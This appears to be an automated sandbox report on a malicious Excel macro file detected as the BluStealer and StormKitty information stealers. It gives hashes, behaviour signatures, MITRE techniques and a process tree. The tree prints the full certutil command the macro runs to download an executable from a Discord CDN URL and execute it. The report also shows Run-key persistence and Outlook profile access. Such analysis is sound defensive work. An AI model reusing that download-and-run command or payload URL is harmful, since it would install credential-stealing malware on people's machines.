blustealer | 42a5596ce75dd6798e7a5564fa6741abd1f8418683ea576f399627b039a393be

General

Target

hesaphareketi-01.xlsm
Size

42KB
MD5

071ebe9503a886684b900b9c76c12291
SHA1

cbce45a21f2a79fe4da70e3921754bdb3b70fa9d
SHA256

42a5596ce75dd6798e7a5564fa6741abd1f8418683ea576f399627b039a393be
SHA512

e8768a1b0412e788f3384aed662bc6e6e6d1ffb6621d33b84a4195aa026cb4392994b4a5c22fe46256055a96dd014ffc7c053932e7e15f9da75a4c370f152d64
SSDEEP

768:uvfGcv4ssnzWBIJYfTH+niSpUvDH/Lv+nWHFFiKk/fNqtf3hzRL+ng8RuQnhu:uvPv4TzWG1BAT/Lv+sFFi3/Fq1xzUg8i

Score

10^/10

blustealer stormkitty collection persistence stealer

Malware Config

Signatures

BluStealer
A Modular information stealer written in Visual Basic.
stealer blustealer

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4836	1300	cmd.exe	80

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/3832-166-0x0000000000F60000-0x0000000000F7A000-memory.dmp	family_stormkitty

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
828	Bqjsolnxfbj.exe.exe
396	Bqjsolnxfbj.exe.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	Bqjsolnxfbj.exe.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AppLaunch.exe
Key opened	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AppLaunch.exe
Key opened	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AppLaunch.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rbxlw = "\"C:\\Users\\Admin\\AppData\\Roaming\\Bjyfkg\\Rbxlw.exe\""	Bqjsolnxfbj.exe.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
75	icanhazip.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 828 set thread context of 396	828	Bqjsolnxfbj.exe.exe	108
PID 396 set thread context of 3832	396	Bqjsolnxfbj.exe.exe	109

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	AppLaunch.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	AppLaunch.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1300	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3056	powershell.exe
3056	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
396	Bqjsolnxfbj.exe.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	828	Bqjsolnxfbj.exe.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	3832	AppLaunch.exe

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
1300	EXCEL.EXE
396	Bqjsolnxfbj.exe.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 1300 wrote to memory of 4836	1300	EXCEL.EXE	92
PID 1300 wrote to memory of 4836	1300	EXCEL.EXE	92
PID 4836 wrote to memory of 2528	4836	cmd.exe	94
PID 4836 wrote to memory of 2528	4836	cmd.exe	94
PID 4836 wrote to memory of 828	4836	cmd.exe	95
PID 4836 wrote to memory of 828	4836	cmd.exe	95
PID 4836 wrote to memory of 828	4836	cmd.exe	95
PID 828 wrote to memory of 3056	828	Bqjsolnxfbj.exe.exe	96
PID 828 wrote to memory of 3056	828	Bqjsolnxfbj.exe.exe	96
PID 828 wrote to memory of 3056	828	Bqjsolnxfbj.exe.exe	96
PID 828 wrote to memory of 396	828	Bqjsolnxfbj.exe.exe	108
PID 828 wrote to memory of 396	828	Bqjsolnxfbj.exe.exe	108
PID 828 wrote to memory of 396	828	Bqjsolnxfbj.exe.exe	108
PID 828 wrote to memory of 396	828	Bqjsolnxfbj.exe.exe	108
PID 828 wrote to memory of 396	828	Bqjsolnxfbj.exe.exe	108
PID 828 wrote to memory of 396	828	Bqjsolnxfbj.exe.exe	108
PID 828 wrote to memory of 396	828	Bqjsolnxfbj.exe.exe	108
PID 828 wrote to memory of 396	828	Bqjsolnxfbj.exe.exe	108
PID 396 wrote to memory of 3832	396	Bqjsolnxfbj.exe.exe	109
PID 396 wrote to memory of 3832	396	Bqjsolnxfbj.exe.exe	109
PID 396 wrote to memory of 3832	396	Bqjsolnxfbj.exe.exe	109
PID 396 wrote to memory of 3832	396	Bqjsolnxfbj.exe.exe	109
PID 396 wrote to memory of 3832	396	Bqjsolnxfbj.exe.exe	109

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AppLaunch.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	AppLaunch.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\hesaphareketi-01.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1300
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c certutil.exe -urlcache -split -f "https://cdn.discordapp.com/attachments/1015550142734159955/1016204043674210314/Niawhqzz.exe" Bqjsolnxfbj.exe.exe && Bqjsolnxfbj.exe.exe
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4836
- - C:\Windows\system32\certutil.exe
    certutil.exe -urlcache -split -f "https://cdn.discordapp.com/attachments/1015550142734159955/1016204043674210314/Niawhqzz.exe" Bqjsolnxfbj.exe.exe
    3⤵
    PID:2528
- - C:\Users\Admin\Documents\Bqjsolnxfbj.exe.exe
    Bqjsolnxfbj.exe.exe
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:828
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3056
  - - C:\Users\Admin\Documents\Bqjsolnxfbj.exe.exe
      C:\Users\Admin\Documents\Bqjsolnxfbj.exe.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:396
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        5⤵
        Accesses Microsoft Outlook profiles
        Checks processor information in registry
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:3832

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Documents\Bqjsolnxfbj.exe.exe

Filesize
7KB

MD5
3e289cd67b5a4afaa3f1e63d6e895dca

SHA1
de4c2cc67f1144d4b161c93c2780312be01d93b7

SHA256
b0cda6b337ec6eb6b4cf853e278fd6cd8bff9bf1cc6291cbdafef3f901af893b

SHA512
cadd382ab3b596b0ffc1abc2ebd9cce5c359df3add81c2cc1209aa7794bfc78fea56c0cbe0da38f5c6a69edee05ec962d820a9b29a1973a01fa3163f6813e7e8

Download Submit
C:\Users\Admin\Documents\Bqjsolnxfbj.exe.exe

Filesize
7KB

MD5
3e289cd67b5a4afaa3f1e63d6e895dca

SHA1
de4c2cc67f1144d4b161c93c2780312be01d93b7

SHA256
b0cda6b337ec6eb6b4cf853e278fd6cd8bff9bf1cc6291cbdafef3f901af893b

SHA512
cadd382ab3b596b0ffc1abc2ebd9cce5c359df3add81c2cc1209aa7794bfc78fea56c0cbe0da38f5c6a69edee05ec962d820a9b29a1973a01fa3163f6813e7e8

Download Submit
C:\Users\Admin\Documents\Bqjsolnxfbj.exe.exe

Filesize
7KB

MD5
3e289cd67b5a4afaa3f1e63d6e895dca

SHA1
de4c2cc67f1144d4b161c93c2780312be01d93b7

SHA256
b0cda6b337ec6eb6b4cf853e278fd6cd8bff9bf1cc6291cbdafef3f901af893b

SHA512
cadd382ab3b596b0ffc1abc2ebd9cce5c359df3add81c2cc1209aa7794bfc78fea56c0cbe0da38f5c6a69edee05ec962d820a9b29a1973a01fa3163f6813e7e8

Download Submit
memory/396-172-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/396-164-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/396-161-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/396-158-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/828-146-0x0000000005500000-0x0000000005592000-memory.dmp

Filesize
584KB

Download
memory/828-148-0x0000000006DA0000-0x0000000006DC2000-memory.dmp

Filesize
136KB

Download
memory/828-147-0x00000000054A0000-0x00000000054AA000-memory.dmp

Filesize
40KB

Download
memory/828-144-0x00000000009B0000-0x00000000009B8000-memory.dmp

Filesize
32KB

Download
memory/828-145-0x0000000005AB0000-0x0000000006054000-memory.dmp

Filesize
5.6MB

Download
memory/1300-171-0x00007FFFBFE70000-0x00007FFFBFE80000-memory.dmp

Filesize
64KB

Download
memory/1300-133-0x00007FFFBFE70000-0x00007FFFBFE80000-memory.dmp

Filesize
64KB

Download
memory/1300-137-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmp

Filesize
64KB

Download
memory/1300-170-0x00007FFFBFE70000-0x00007FFFBFE80000-memory.dmp

Filesize
64KB

Download
memory/1300-169-0x00007FFFBFE70000-0x00007FFFBFE80000-memory.dmp

Filesize
64KB

Download
memory/1300-168-0x00007FFFBFE70000-0x00007FFFBFE80000-memory.dmp

Filesize
64KB

Download
memory/1300-134-0x00007FFFBFE70000-0x00007FFFBFE80000-memory.dmp

Filesize
64KB

Download
memory/1300-135-0x00007FFFBFE70000-0x00007FFFBFE80000-memory.dmp

Filesize
64KB

Download
memory/1300-132-0x00007FFFBFE70000-0x00007FFFBFE80000-memory.dmp

Filesize
64KB

Download
memory/1300-136-0x00007FFFBFE70000-0x00007FFFBFE80000-memory.dmp

Filesize
64KB

Download
memory/1300-138-0x00007FFFBD930000-0x00007FFFBD940000-memory.dmp

Filesize
64KB

Download
memory/3056-155-0x0000000007340000-0x00000000079BA000-memory.dmp

Filesize
6.5MB

Download
memory/3056-156-0x0000000006C00000-0x0000000006C1A000-memory.dmp

Filesize
104KB

Download
memory/3056-154-0x0000000005B50000-0x0000000005B6E000-memory.dmp

Filesize
120KB

Download
memory/3056-153-0x00000000054E0000-0x0000000005546000-memory.dmp

Filesize
408KB

Download
memory/3056-152-0x0000000005470000-0x00000000054D6000-memory.dmp

Filesize
408KB

Download
memory/3056-151-0x0000000004DA0000-0x00000000053C8000-memory.dmp

Filesize
6.2MB

Download
memory/3056-150-0x0000000002550000-0x0000000002586000-memory.dmp

Filesize
216KB

Download
memory/3832-166-0x0000000000F60000-0x0000000000F7A000-memory.dmp

Filesize
104KB

Download
memory/3832-173-0x0000000005D30000-0x0000000005DCC000-memory.dmp

Filesize
624KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads